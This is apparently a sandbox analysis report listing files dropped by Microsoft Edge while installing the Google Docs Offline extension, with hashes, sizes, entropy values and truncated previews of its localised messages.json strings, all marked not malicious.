SHA-256:958C0F664FCA20855FA84293566B2DDB7F297185619143457D6479E6AC81D240
SHA-512:126B80CD3428C0BC459EEAAFCBE4B9FDE2541A57F19F3EC7346BAF449F36DC073A9CF015594A57203255941551B25F6FAA6D2C73C57C44725F563883FF902606
Malicious:false
Reputation:unknown
Preview:{.. "createnew": {.. "message": ".J L.TREHOZ.SA".. },.. "explanationofflinedisabled": {.. "message": "Jelenleg offline .llapotban van. Ha a Google Dokumentumokat internetkapcsolat n.lk.l szeretn. haszn.lni, a legk.zelebbi internethaszn.lata sor.n nyissa meg a Google Dokumentumok kezd.oldal.n tal.lhat. be.ll.t.sokat, .s tiltsa le az offline szinkroniz.l.s be.ll.t.st.".. },.. "explanationofflineenabled": {.. "message": "Offline .llapotban van, de az el.rhet. f.jlokat .gy is szerkesztheti, valamint l.trehozhat .jakat.".. },.. "extdesc": {.. "message": "Szerkesszen, hozzon l.tre .s tekintsen meg dokumentumokat, t.bl.zatokat .s prezent.ci.kat . ak.r internetkapcsolat n.lk.l is.".. },.. "extname": {.. "message": "Google Dokumentumok Offline".. },.. "learnmore": {.. "message": "Tov.bbi inform.ci.".. },.. "popuphelptext": {.. "message": ".rjon, szerkesszen .s dolgozzon egy.tt m.sokkal

C:\Users\user\AppData\Local\Temp\scoped_dir6872_1898885788\CRX_INSTALL\_locales\hy\messages.json

Download File
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:JSON data
Category:dropped
Size (bytes):2771
Entropy (8bit):3.7629875118570055
Encrypted:false
SSDEEP:
MD5:55DE859AD778E0AA9D950EF505B29DA9
SHA1:4479BE637A50C9EE8A2F7690AD362A6A8FFC59B2
SHA-256:0B16E3F8BD904A767284345AE86A0A9927C47AFE89E05EA2B13AD80009BDF9E4
SHA-512:EDAB2FCC14CABB6D116E9C2907B42CFBC34F1D9035F43E454F1F4D1F3774C100CBADF6B4C81B025810ED90FA91C22F1AEFE83056E4543D92527E4FE81C7889A8
Malicious:false
Reputation:unknown
Preview:{"createnew":{"message":"\u054d\u054f\u0535\u0542\u053e\u0535\u053c \u0546\u0548\u0550"},"explanationofflinedisabled":{"message":"Google \u0553\u0561\u057d\u057f\u0561\u0569\u0572\u0569\u0565\u0580\u0568 \u0576\u0561\u0587 \u0561\u0576\u0581\u0561\u0576\u0581 \u057c\u0565\u056a\u056b\u0574\u0578\u0582\u0574 \u0585\u0563\u057f\u0561\u0563\u0578\u0580\u056e\u0565\u056c\u0578\u0582 \u0570\u0561\u0574\u0561\u0580 \u0574\u056b\u0561\u0581\u0565\u0584 \u0570\u0561\u0574\u0561\u0581\u0561\u0576\u0581\u056b\u0576, \u0562\u0561\u0581\u0565\u0584 \u056e\u0561\u057c\u0561\u0575\u0578\u0582\u0569\u0575\u0561\u0576 \u0563\u056c\u056d\u0561\u057e\u0578\u0580 \u0567\u057b\u0568, \u0561\u0576\u0581\u0565\u0584 \u056f\u0561\u0580\u0563\u0561\u057e\u0578\u0580\u0578\u0582\u0574\u0576\u0565\u0580 \u0587 \u0574\u056b\u0561\u0581\u0580\u0565\u0584 \u0561\u0576\u0581\u0561\u0576\u0581 \u0570\u0561\u0574\u0561\u056a\u0561\u0574\u0561\u0581\u0578\u0582\u0574\u0568:"},"explanationofflineenabled":{"message":"\u

C:\Users\user\AppData\Local\Temp\scoped_dir6872_1898885788\CRX_INSTALL\_locales\id\messages.json

Download File
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:JSON data
Category:dropped
Size (bytes):858
Entropy (8bit):4.474411340525479
Encrypted:false
SSDEEP:
MD5:34D6EE258AF9429465AE6A078C2FB1F5
SHA1:612CAE151984449A4346A66C0A0DF4235D64D932
SHA-256:E3C86DDD2EFEBE88EED8484765A9868202546149753E03A61EB7C28FD62CFCA1
SHA-512:20427807B64A0F79A6349F8A923152D9647DA95C05DE19AD3A4BF7DB817E25227F3B99307C8745DD323A6591B515221BD2F1E92B6F1A1783BDFA7142E84601B1
Malicious:false
Reputation:unknown
Preview:{.. "createnew": {.. "message": "BUAT BARU".. },.. "explanationofflinedisabled": {.. "message": "Anda sedang offline. Untuk menggunakan Google Dokumen tanpa koneksi internet, buka setelan di beranda Google Dokumen dan aktifkan sinkronisasi offline saat terhubung ke internet.".. },.. "explanationofflineenabled": {.. "message": "Anda sedang offline, namun Anda masih dapat mengedit file yang tersedia atau membuat file baru.".. },.. "extdesc": {.. "message": "Edit, buat, dan lihat dokumen, spreadsheet, dan presentasi . tanpa perlu akses internet.".. },.. "extname": {.. "message": "Google Dokumen Offline".. },.. "learnmore": {.. "message": "Pelajari Lebih Lanjut".. },.. "popuphelptext": {.. "message": "Tulis, edit, dan gabungkan di mana saja, dengan atau tanpa koneksi internet.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir6872_1898885788\CRX_INSTALL\_locales\is\messages.json

Download File
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:JSON data
Category:dropped
Size (bytes):954
Entropy (8bit):4.631887382471946
Encrypted:false
SSDEEP:
MD5:1F565FB1C549B18AF8BBFED8DECD5D94
SHA1:B57F4BDAE06FF3DFC1EB3E56B6F2F204D6F63638
SHA-256:E16325D1A641EF7421F2BAFCD6433D53543C89D498DD96419B03CBA60B9C7D60
SHA-512:A60B8E042A9BCDCC136B87948E9924A0B24D67C6CA9803904B876F162A0AD82B9619F1316BE9FF107DD143B44F7E6F5DF604ABFE00818DEB40A7D62917CDA69F
Malicious:false
Reputation:unknown
Preview:{"createnew":{"message":"B\u00daA TIL N\u00ddTT"},"explanationofflinedisabled":{"message":"\u00de\u00fa ert \u00e1n nettengingar. Til a\u00f0 nota Google skj\u00f6l \u00e1n nettengingar skaltu opna stillingarnar \u00e1 heimas\u00ed\u00f0u Google skjala og virkja samstillingu \u00e1n nettengingar n\u00e6st \u00feegar \u00fe\u00fa tengist netinu."},"explanationofflineenabled":{"message":"Engin nettenging. \u00de\u00fa getur samt sem \u00e1\u00f0ur breytt tilt\u00e6kum skr\u00e1m e\u00f0a b\u00fai\u00f0 til n\u00fdjar."},"extdesc":{"message":"Breyttu, b\u00fa\u00f0u til og sko\u00f0a\u00f0u skj\u00f6lin \u00fe\u00edn, t\u00f6flureikna og kynningar \u2014 allt \u00e1n nettengingar."},"extname":{"message":"Google skj\u00f6l \u00e1n nettengingar"},"learnmore":{"message":"Frekari uppl\u00fdsingar"},"popuphelptext":{"message":"Skrifa\u00f0u, breyttu og starfa\u00f0u me\u00f0 \u00f6\u00f0rum hvort sem nettenging er til sta\u00f0ar e\u00f0a ekki."}}.

C:\Users\user\AppData\Local\Temp\scoped_dir6872_1898885788\CRX_INSTALL\_locales\it\messages.json

Download File
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:JSON data
Category:dropped
Size (bytes):899
Entropy (8bit):4.474743599345443
Encrypted:false
SSDEEP:
MD5:0D82B734EF045D5FE7AA680B6A12E711
SHA1:BD04F181E4EE09F02CD53161DCABCEF902423092
SHA-256:F41862665B13C0B4C4F562EF1743684CCE29D4BCF7FE3EA494208DF253E33885
SHA-512:01F305A280112482884485085494E871C66D40C0B03DE710B4E5F49C6A478D541C2C1FDA2CEAF4307900485946DEE9D905851E98A2EB237642C80D464D1B3ADA
Malicious:false
Reputation:unknown
Preview:{.. "createnew": {.. "message": "CREA NUOVO".. },.. "explanationofflinedisabled": {.. "message": "Sei offline. Per utilizzare Documenti Google senza una connessione Internet, apri le impostazioni nella home page di Documenti Google e attiva la sincronizzazione offline la prossima volta che ti colleghi a Internet.".. },.. "explanationofflineenabled": {.. "message": "Sei offline, ma puoi comunque modificare i file disponibili o crearne di nuovi.".. },.. "extdesc": {.. "message": "Modifica, crea e visualizza documenti, fogli di lavoro e presentazioni, senza accesso a Internet.".. },.. "extname": {.. "message": "Documenti Google offline".. },.. "learnmore": {.. "message": "Ulteriori informazioni".. },.. "popuphelptext": {.. "message": "Scrivi, modifica e collabora ovunque ti trovi, con o senza una connessione Internet.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir6872_1898885788\CRX_INSTALL\_locales\iw\messages.json

Download File
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:JSON data
Category:dropped
Size (bytes):2230
Entropy (8bit):3.8239097369647634
Encrypted:false
SSDEEP:
MD5:26B1533C0852EE4661EC1A27BD87D6BF
SHA1:18234E3ABAF702DF9330552780C2F33B83A1188A
SHA-256:BBB81C32F482BA3216C9B1189C70CEF39CA8C2181AF3538FFA07B4C6AD52F06A
SHA-512:450BFAF0E8159A4FAE309737EA69CA8DD91CAAFD27EF662087C4E7716B2DCAD3172555898E75814D6F11487F4F254DE8625EF0CFEA8DF0133FC49E18EC7FD5D2
Malicious:false
Reputation:unknown
Preview:{"createnew":{"message":"\u05d9\u05e6\u05d9\u05e8\u05ea \u05d7\u05d3\u05e9"},"explanationofflinedisabled":{"message":"\u05d0\u05d9\u05df \u05dc\u05da \u05d7\u05d9\u05d1\u05d5\u05e8 \u05dc\u05d0\u05d9\u05e0\u05d8\u05e8\u05e0\u05d8. \u05db\u05d3\u05d9 \u05dc\u05d4\u05e9\u05ea\u05de\u05e9 \u05d1-Google Docs \u05dc\u05dc\u05d0 \u05d7\u05d9\u05d1\u05d5\u05e8 \u05dc\u05d0\u05d9\u05e0\u05d8\u05e8\u05e0\u05d8, \u05d1\u05d4\u05ea\u05d7\u05d1\u05e8\u05d5\u05ea \u05d4\u05d1\u05d0\u05d4 \u05dc\u05d0\u05d9\u05e0\u05d8\u05e8\u05e0\u05d8, \u05d9\u05e9 \u05dc\u05e2\u05d1\u05d5\u05e8 \u05dc\u05e7\u05d8\u05e2 \u05d4\u05d4\u05d2\u05d3\u05e8\u05d5\u05ea \u05d1\u05d3\u05e3 \u05d4\u05d1\u05d9\u05ea \u05e9\u05dc Google Docs \u05d5\u05dc\u05d4\u05e4\u05e2\u05d9\u05dc \u05e1\u05e0\u05db\u05e8\u05d5\u05df \u05d1\u05de\u05e6\u05d1 \u05d0\u05d5\u05e4\u05dc\u05d9\u05d9\u05df."},"explanationofflineenabled":{"message":"\u05d0\u05d9\u05df \u05dc\u05da \u05d7\u05d9\u05d1\u05d5\u05e8 \u05dc\u05d0\u05d9\u05e0\u05d8\u05e

C:\Users\user\AppData\Local\Temp\scoped_dir6872_1898885788\CRX_INSTALL\_locales\ja\messages.json

Download File
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:JSON data
Category:dropped
Size (bytes):1160
Entropy (8bit):5.292894989863142
Encrypted:false
SSDEEP:
MD5:15EC1963FC113D4AD6E7E59AE5DE7C0A
SHA1:4017FC6D8B302335469091B91D063B07C9E12109
SHA-256:34AC08F3C4F2D42962A3395508818B48CA323D22F498738CC9F09E78CB197D73
SHA-512:427251F471FA3B759CA1555E9600C10F755BC023701D058FF661BEC605B6AB94CFB3456C1FEA68D12B4D815FFBAFABCEB6C12311DD1199FC783ED6863AF97C0F
Malicious:false
Reputation:unknown
Preview:{.. "createnew": {.. "message": "....".. },.. "explanationofflinedisabled": {.. "message": "....................... Google ............................... Google .............. [..] .......[.......] ...........".. },.. "explanationofflineenabled": {.. "message": ".............................................".. },.. "extdesc": {.. "message": ".........................................................".. },.. "extname": {.. "message": "Google ..... ......".. },.. "learnmore": {.. "message": "..".. },.. "popuphelp

C:\Users\user\AppData\Local\Temp\scoped_dir6872_1898885788\CRX_INSTALL\_locales\ka\messages.json

Download File
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:JSON data
Category:dropped
Size (bytes):3264
Entropy (8bit):3.586016059431306
Encrypted:false
SSDEEP:
MD5:83F81D30913DC4344573D7A58BD20D85
SHA1:5AD0E91EA18045232A8F9DF1627007FE506A70E0
SHA-256:30898BBF51BDD58DB397FF780F061E33431A38EF5CFC288B5177ECF76B399F26
SHA-512:85F97F12AD4482B5D9A6166BB2AE3C4458A582CF575190C71C1D8E0FB87C58482F8C0EFEAD56E3A70EDD42BED945816DB5E07732AD27B8FFC93F4093710DD58F
Malicious:false
Reputation:unknown
Preview:{"createnew":{"message":"\u10d0\u10ee\u10da\u10d8\u10e1 \u10e8\u10d4\u10e5\u10db\u10dc\u10d0"},"explanationofflinedisabled":{"message":"\u10d7\u10e5\u10d5\u10d4\u10dc \u10ee\u10d0\u10d6\u10d2\u10d0\u10e0\u10d4\u10e8\u10d4 \u10ee\u10d0\u10e0\u10d7. Google Docs-\u10d8\u10e1 \u10d8\u10dc\u10e2\u10d4\u10e0\u10dc\u10d4\u10e2\u10d7\u10d0\u10dc \u10d9\u10d0\u10d5\u10e8\u10d8\u10e0\u10d8\u10e1 \u10d2\u10d0\u10e0\u10d4\u10e8\u10d4 \u10d2\u10d0\u10db\u10dd\u10e1\u10d0\u10e7\u10d4\u10dc\u10d4\u10d1\u10da\u10d0\u10d3 \u10d2\u10d0\u10d3\u10d0\u10d3\u10d8\u10d7 \u10de\u10d0\u10e0\u10d0\u10db\u10d4\u10e2\u10e0\u10d4\u10d1\u10d6\u10d4 Google Docs-\u10d8\u10e1 \u10db\u10d7\u10d0\u10d5\u10d0\u10e0 \u10d2\u10d5\u10d4\u10e0\u10d3\u10d6\u10d4 \u10d3\u10d0 \u10e9\u10d0\u10e0\u10d7\u10d4\u10d7 \u10ee\u10d0\u10d6\u10d2\u10d0\u10e0\u10d4\u10e8\u10d4 \u10e1\u10d8\u10dc\u10e5\u10e0\u10dd\u10dc\u10d8\u10d6\u10d0\u10ea\u10d8\u10d0, \u10e0\u10dd\u10d3\u10d4\u10e1\u10d0\u10ea \u10e8\u10d4\u10db\u10d3\u10d2\u10dd\u10

C:\Users\user\AppData\Local\Temp\scoped_dir6872_1898885788\CRX_INSTALL\_locales\kk\messages.json

Download File
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:JSON data
Category:dropped
Size (bytes):3235
Entropy (8bit):3.6081439490236464
Encrypted:false
SSDEEP:
MD5:2D94A58795F7B1E6E43C9656A147AD3C
SHA1:E377DB505C6924B6BFC9D73DC7C02610062F674E
SHA-256:548DC6C96E31A16CE355DC55C64833B08EF3FBA8BF33149031B4A685959E3AF4
SHA-512:F51CC857E4CF2D4545C76A2DCE7D837381CE59016E250319BF8D39718BE79F9F6EE74EA5A56DE0E8759E4E586D93430D51651FC902376D8A5698628E54A0F2D8
Malicious:false
Reputation:unknown
Preview:{"createnew":{"message":"\u0416\u0410\u04a2\u0410\u0421\u042b\u041d \u0416\u0410\u0421\u0410\u0423"},"explanationofflinedisabled":{"message":"\u0421\u0456\u0437 \u043e\u0444\u043b\u0430\u0439\u043d \u0440\u0435\u0436\u0438\u043c\u0456\u043d\u0434\u0435\u0441\u0456\u0437. Google Docs \u049b\u043e\u043b\u0434\u0430\u043d\u0431\u0430\u0441\u044b\u043d \u0436\u0435\u043b\u0456 \u0431\u0430\u0439\u043b\u0430\u043d\u044b\u0441\u044b\u043d\u0441\u044b\u0437 \u049b\u043e\u043b\u0434\u0430\u043d\u0443 \u04af\u0448\u0456\u043d, \u043a\u0435\u043b\u0435\u0441\u0456 \u0436\u043e\u043b\u044b \u0436\u0435\u043b\u0456\u0433\u0435 \u049b\u043e\u0441\u044b\u043b\u0493\u0430\u043d\u0434\u0430, Google Docs \u043d\u0435\u0433\u0456\u0437\u0433\u0456 \u0431\u0435\u0442\u0456\u043d\u0435\u043d \u043f\u0430\u0440\u0430\u043c\u0435\u0442\u0440\u043b\u0435\u0440 \u0431\u04e9\u043b\u0456\u043c\u0456\u043d \u043a\u0456\u0440\u0456\u043f, \u043e\u0444\u043b\u0430\u0439\u043d \u0440\u0435\u0436\u0438\u043c\u0456\u

C:\Users\user\AppData\Local\Temp\scoped_dir6872_1898885788\CRX_INSTALL\_locales\km\messages.json

Download File
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:JSON data
Category:dropped
Size (bytes):3122
Entropy (8bit):3.891443295908904
Encrypted:false
SSDEEP:
MD5:B3699C20A94776A5C2F90AEF6EB0DAD9
SHA1:1F9B968B0679A20FA097624C9ABFA2B96C8C0BEA
SHA-256:A6118F0A0DE329E07C01F53CD6FB4FED43E54C5F53DB4CD1C7F5B2B4D9FB10E6
SHA-512:1E8D15B8BFF1D289434A244172F9ED42B4BB6BCB6372C1F300B01ACEA5A88167E97FEDABA0A7AE3BEB5E24763D1B09046AE8E30745B80E2E2FE785C94DF362F6
Malicious:false
Reputation:unknown
Preview:{"createnew":{"message":"\u1794\u1784\u17d2\u1780\u17be\u178f\u200b\u1790\u17d2\u1798\u17b8"},"explanationofflinedisabled":{"message":"\u17a2\u17d2\u1793\u1780\u200b\u1782\u17d2\u1798\u17b6\u1793\u200b\u17a2\u17ca\u17b8\u1793\u1792\u17ba\u178e\u17b7\u178f\u17d4 \u178a\u17be\u1798\u17d2\u1794\u17b8\u200b\u1794\u17d2\u179a\u17be Google \u17af\u1780\u179f\u17b6\u179a\u200b\u1794\u17b6\u1793\u200b\u200b\u178a\u17c4\u1799\u200b\u200b\u1798\u17b7\u1793\u1798\u17b6\u1793\u200b\u200b\u200b\u17a2\u17ca\u17b8\u1793\u1792\u17ba\u178e\u17b7\u178f \u179f\u17bc\u1798\u200b\u200b\u1791\u17c5\u200b\u1780\u17b6\u1793\u17cb\u200b\u1780\u17b6\u179a\u200b\u1780\u17c6\u178e\u178f\u17cb\u200b\u1793\u17c5\u200b\u179b\u17be\u200b\u1782\u17c1\u17a0\u1791\u17c6\u1796\u17d0\u179a Google \u17af\u1780\u179f\u17b6\u179a \u1793\u17b7\u1784\u200b\u1794\u17be\u1780\u200b\u1780\u17b6\u179a\u1792\u17d2\u179c\u17be\u200b\u179f\u1798\u1780\u17b6\u179b\u1780\u1798\u17d2\u1798\u200b\u200b\u200b\u1782\u17d2\u1798\u17b6\u1793

C:\Users\user\AppData\Local\Temp\scoped_dir6872_1898885788\CRX_INSTALL\_locales\kn\messages.json

Download File
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:JSON data
Category:dropped
Size (bytes):1880
Entropy (8bit):4.295185867329351
Encrypted:false
SSDEEP:
MD5:8E16966E815C3C274EEB8492B1EA6648
SHA1:7482ED9F1C9FD9F6F9BA91AB15921B19F64C9687
SHA-256:418FF53FCA505D54268413C796E4DF80E947A09F399AB222A90B81E93113D5B5
SHA-512:85B28202E874B1CF45B37BA05B87B3D8D6FE38E89C6011C4240CF6B563EA6DA60181D712CCE20D07C364F4A266A4EC90C4934CC8B7BB2013CB3B22D755796E38
Malicious:false
Reputation:unknown
Preview:{.. "createnew": {.. "message": "........ .....".. },.. "explanationofflinedisabled": {.. "message": ".... ..................... ......... ............. Google ...... ....., Google ...... ............ ............... .... ..... ...... .... .... ............ ............. ........ ..... ... .....".. },.. "explanationofflineenabled": {.. "message": ".... ...................., .... .... .... ......... ........... ............ .... ........ .........."..

C:\Users\user\AppData\Local\Temp\scoped_dir6872_1898885788\CRX_INSTALL\_locales\ko\messages.json

Download File
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:JSON data
Category:dropped
Size (bytes):1042
Entropy (8bit):5.3945675025513955
Encrypted:false
SSDEEP:
MD5:F3E59EEEB007144EA26306C20E04C292
SHA1:83E7BDFA1F18F4C7534208493C3FF6B1F2F57D90
SHA-256:C52D9B955D229373725A6E713334BBB31EA72EFA9B5CF4FBD76A566417B12CAC
SHA-512:7808CB5FF041B002CBD78171EC5A0B4DBA3E017E21F7E8039084C2790F395B839BEE04AD6C942EED47CCB53E90F6DE818A725D1450BF81BA2990154AFD3763AF
Malicious:false
Reputation:unknown
Preview:{.. "createnew": {.. "message": ".. ...".. },.. "explanationofflinedisabled": {.. "message": ".... ...... ... .. .. Google Docs. ..... Google Docs .... .... .... .... .... ..... . .... .... ..... ......".. },.. "explanationofflineenabled": {.. "message": ".... ...... ... .. ... ... ..... ... ... .. . .....".. },.. "extdesc": {.. "message": ".... .... ... .., ...... . ....... .., .., ......".. },.. "extname": {.. "message": "Google Docs ....".. },.. "learnmore": {.. "message": "... ....".. },.. "popuphelptext": {.. "message": "... .. ... .... ..... .... .... .....

C:\Users\user\AppData\Local\Temp\scoped_dir6872_1898885788\CRX_INSTALL\_locales\lo\messages.json

Download File
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:JSON data
Category:dropped
Size (bytes):2535
Entropy (8bit):3.8479764584971368
Encrypted:false
SSDEEP:
MD5:E20D6C27840B406555E2F5091B118FC5
SHA1:0DCECC1A58CEB4936E255A64A2830956BFA6EC14
SHA-256:89082FB05229826BC222F5D22C158235F025F0E6DF67FF135A18BD899E13BB8F
SHA-512:AD53FC0B153005F47F9F4344DF6C4804049FAC94932D895FD02EEBE75222CFE77EEDD9CD3FDC4C88376D18C5972055B00190507AA896488499D64E884F84F093
Malicious:false
Reputation:unknown
Preview:{"createnew":{"message":"\u0eaa\u0ec9\u0eb2\u0e87\u0ec3\u0edd\u0ec8"},"explanationofflinedisabled":{"message":"\u0e97\u0ec8\u0eb2\u0e99\u0ead\u0ead\u0e9a\u0ea5\u0eb2\u0e8d\u0ea2\u0eb9\u0ec8. \u0ec0\u0e9e\u0eb7\u0ec8\u0ead\u0ec3\u0e8a\u0ec9 Google Docs \u0ec2\u0e94\u0e8d\u0e9a\u0ecd\u0ec8\u0ec0\u0e8a\u0eb7\u0ec8\u0ead\u0ea1\u0e95\u0ecd\u0ec8\u0ead\u0eb4\u0e99\u0ec0\u0e95\u0eb5\u0ec0\u0e99\u0eb1\u0e94, \u0ec3\u0eab\u0ec9\u0ec4\u0e9b\u0e97\u0eb5\u0ec8\u0e81\u0eb2\u0e99\u0e95\u0eb1\u0ec9\u0e87\u0e84\u0ec8\u0eb2\u0ec3\u0e99\u0edc\u0ec9\u0eb2 Google Docs \u0ec1\u0ea5\u0ec9\u0ea7\u0ec0\u0e9b\u0eb5\u0e94\u0ec3\u0e8a\u0ec9\u0e81\u0eb2\u0e99\u0e8a\u0eb4\u0ec9\u0e87\u0ec1\u0e9a\u0e9a\u0ead\u0ead\u0e9a\u0ea5\u0eb2\u0e8d\u0ec3\u0e99\u0ec0\u0e97\u0eb7\u0ec8\u0ead\u0e95\u0ecd\u0ec8\u0ec4\u0e9b\u0e97\u0eb5\u0ec8\u0e97\u0ec8\u0eb2\u0e99\u0ec0\u0e8a\u0eb7\u0ec8\u0ead\u0ea1\u0e95\u0ecd\u0ec8\u0ead\u0eb4\u0e99\u0ec0\u0e95\u0eb5\u0ec0\u0e99\u0eb1\u0e94."},"explanationofflineenabled":{"message":"\u0e97\u0ec

C:\Users\user\AppData\Local\Temp\scoped_dir6872_1898885788\CRX_INSTALL\_locales\lt\messages.json

Download File
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:JSON data
Category:dropped
Size (bytes):1028
Entropy (8bit):4.797571191712988
Encrypted:false
SSDEEP:
MD5:970544AB4622701FFDF66DC556847652
SHA1:14BEE2B77EE74C5E38EBD1DB09E8D8104CF75317
SHA-256:5DFCBD4DFEAEC3ABE973A78277D3BD02CD77AE635D5C8CD1F816446C61808F59
SHA-512:CC12D00C10B970189E90D47390EEB142359A8D6F3A9174C2EF3AE0118F09C88AB9B689D9773028834839A7DFAF3AAC6747BC1DCB23794A9F067281E20B8DC6EA
Malicious:false
Reputation:unknown
Preview:{.. "createnew": {.. "message": "SUKURTI NAUJ.".. },.. "explanationofflinedisabled": {.. "message": "Esate neprisijung.. Jei norite naudoti .Google. dokumentus be interneto ry.io, pagrindiniame .Google. dokument. puslapyje eikite . nustatym. skilt. ir .junkite sinchronizavim. neprisijungus, kai kit. kart. b.site prisijung. prie interneto.".. },.. "explanationofflineenabled": {.. "message": "Esate neprisijung., bet vis tiek galite redaguoti pasiekiamus failus arba sukurti nauj..".. },.. "extdesc": {.. "message": "Redaguokite, kurkite ir per.i.r.kite savo dokumentus, skai.iuokles ir pristatymus . visk. darykite be prieigos prie interneto.".. },.. "extname": {.. "message": ".Google. dokumentai neprisijungus".. },.. "learnmore": {.. "message": "Su.inoti daugiau".. },.. "popuphelptext": {.. "message": "Ra.ykite, redaguokite ir bendradarbiaukite bet kurioje vietoje naudodami interneto ry.. arba

C:\Users\user\AppData\Local\Temp\scoped_dir6872_1898885788\CRX_INSTALL\_locales\lv\messages.json

Download File
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:JSON data
Category:dropped
Size (bytes):994
Entropy (8bit):4.700308832360794
Encrypted:false
SSDEEP:
MD5:A568A58817375590007D1B8ABCAEBF82
SHA1:B0F51FE6927BB4975FC6EDA7D8A631BF0C1AB597
SHA-256:0621DE9161748F45D53052ED8A430962139D7F19074C7FFE7223ECB06B0B87DB
SHA-512:FCFBADEC9F73975301AB404DB6B09D31457FAC7CCAD2FA5BE348E1CAD6800F87CB5B56DE50880C55BBADB3C40423351A6B5C2D03F6A327D898E35F517B1C628C
Malicious:false
Reputation:unknown
Preview:{.. "createnew": {.. "message": "IZVEIDOT JAUNU".. },.. "explanationofflinedisabled": {.. "message": "J.s esat bezsaist.. Lai lietotu pakalpojumu Google dokumenti bez interneta savienojuma, n.kamaj. reiz., kad ir izveidots savienojums ar internetu, atveriet Google dokumentu s.kumlapas iestat.jumu izv.lni un iesl.dziet sinhroniz.ciju bezsaist..".. },.. "explanationofflineenabled": {.. "message": "J.s esat bezsaist., ta.u varat redi..t pieejamos failus un izveidot jaunus.".. },.. "extdesc": {.. "message": "Redi..jiet, veidojiet un skatiet savus dokumentus, izkl.jlapas un prezent.cijas, neizmantojot savienojumu ar internetu.".. },.. "extname": {.. "message": "Google dokumenti bezsaist.".. },.. "learnmore": {.. "message": "Uzziniet vair.k".. },.. "popuphelptext": {.. "message": "Rakstiet, redi..jiet un sadarbojieties ar interneta savienojumu vai bez t. neatkar.gi no t., kur atrodaties.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir6872_1898885788\CRX_INSTALL\_locales\ml\messages.json

Download File
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:JSON data
Category:dropped
Size (bytes):2091
Entropy (8bit):4.358252286391144
Encrypted:false
SSDEEP:
MD5:4717EFE4651F94EFF6ACB6653E868D1A
SHA1:B8A7703152767FBE1819808876D09D9CC1C44450
SHA-256:22CA9415E294D9C3EC3384B9D08CDAF5164AF73B4E4C251559E09E529C843EA6
SHA-512:487EAB4938F6BC47B1D77DD47A5E2A389B94E01D29849E38E96C95CABC7BD98679451F0E22D3FEA25C045558CD69FDDB6C4FEF7C581141F1C53C4AA17578D7F7
Malicious:false
Reputation:unknown
Preview:{.. "createnew": {.. "message": "....... ............".. },.. "explanationofflinedisabled": {.. "message": "...... ........... ........... ............. ..... Google ....... ..........., Google ....... .......... ............. .... ...... ...... ... ............... .................... '.......... ................' .........".. },.. "explanationofflineenabled": {.. "message": "................., .......... ......... ....... ...... ..............

C:\Users\user\AppData\Local\Temp\scoped_dir6872_1898885788\CRX_INSTALL\_locales\mn\messages.json

Download File
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:JSON data
Category:dropped
Size (bytes):2778
Entropy (8bit):3.595196082412897
Encrypted:false
SSDEEP:
MD5:83E7A14B7FC60D4C66BF313C8A2BEF0B
SHA1:1CCF1D79CDED5D65439266DB58480089CC110B18
SHA-256:613D8751F6CC9D3FA319F4B7EA8B2BD3BED37FD077482CA825929DD7C12A69A8
SHA-512:3742E24FFC4B5283E6EE496813C1BDC6835630D006E8647D427C3DE8B8E7BF814201ADF9A27BFAB3ABD130B6FEC64EBB102AC0EB8DEDFE7B63D82D3E1233305D
Malicious:false
Reputation:unknown
Preview:{"createnew":{"message":"\u0428\u0418\u041d\u0418\u0419\u0413 \u04ae\u04ae\u0421\u0413\u042d\u0425"},"explanationofflinedisabled":{"message":"\u0422\u0430 \u043e\u0444\u043b\u0430\u0439\u043d \u0431\u0430\u0439\u043d\u0430. Google \u0414\u043e\u043a\u044b\u0433 \u0438\u043d\u0442\u0435\u0440\u043d\u044d\u0442\u0433\u04af\u0439\u0433\u044d\u044d\u0440 \u0430\u0448\u0438\u0433\u043b\u0430\u0445\u044b\u043d \u0442\u0443\u043b\u0434 \u0434\u0430\u0440\u0430\u0430\u0433\u0438\u0439\u043d \u0443\u0434\u0430\u0430 \u0438\u043d\u0442\u0435\u0440\u043d\u044d\u0442\u044d\u0434 \u0445\u043e\u043b\u0431\u043e\u0433\u0434\u043e\u0445\u0434\u043e\u043e Google \u0414\u043e\u043a\u044b\u043d \u043d\u04af\u04af\u0440 \u0445\u0443\u0443\u0434\u0430\u0441\u043d\u0430\u0430\u0441 \u0442\u043e\u0445\u0438\u0440\u0433\u043e\u043e \u0434\u043e\u0442\u043e\u0440\u0445 \u043e\u0444\u043b\u0430\u0439\u043d \u0441\u0438\u043d\u043a\u0438\u0439\u0433 \u0438\u0434\u044d\u0432\u0445\u0436\u04af\u04af\u043b\u043d\u0

C:\Users\user\AppData\Local\Temp\scoped_dir6872_1898885788\CRX_INSTALL\_locales\mr\messages.json

Download File
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:JSON data
Category:dropped
Size (bytes):1719
Entropy (8bit):4.287702203591075
Encrypted:false
SSDEEP:
MD5:3B98C4ED8874A160C3789FEAD5553CFA
SHA1:5550D0EC548335293D962AAA96B6443DD8ABB9F6
SHA-256:ADEB082A9C754DFD5A9D47340A3DDCC19BF9C7EFA6E629A2F1796305F1C9A66F
SHA-512:5139B6C6DF9459C7B5CDC08A98348891499408CD75B46519BA3AC29E99AAAFCC5911A1DEE6C3A57E3413DBD0FAE72D7CBC676027248DCE6364377982B5CE4151
